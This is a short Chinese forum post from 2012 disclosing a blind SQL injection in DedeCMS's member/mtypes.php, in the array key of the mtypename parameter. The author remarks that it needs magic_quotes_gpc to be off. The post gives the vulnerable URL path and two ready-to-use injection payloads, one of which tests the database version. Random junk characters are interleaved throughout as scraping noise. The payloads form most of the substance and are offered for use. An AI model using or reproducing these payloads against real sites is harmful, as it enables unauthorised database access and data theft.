需要magic_quotes_gpc = Off,所以说是鸡肋啊.- L/ K. y" E m% X: R) L( c- _
- f& c, q! k# B* b
% A4 F" |& m3 _; @
发生在数组key里的注射漏洞,有点意思.; B2 z# r$ n1 k/ u5 `
' T; ]. a: {5 }" S3 f这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
! _! R# v6 o( A, w( D) Y 3 e! O1 V v6 p: v6 B* R
http://www.xxx.com /dede/member/mtypes.php?dopost=save
0 D7 J3 x1 {! a+ m: Q/ Z
! N% z3 R7 u! [# \% A; Qexploit:
. c4 D- [% M! k& u$ t) \mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
6 c* b3 \$ `7 Cmtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
# M# F% X" N5 n2 U* k: G |
发表于 2012-12-20 08:08:09
收藏
支持
反对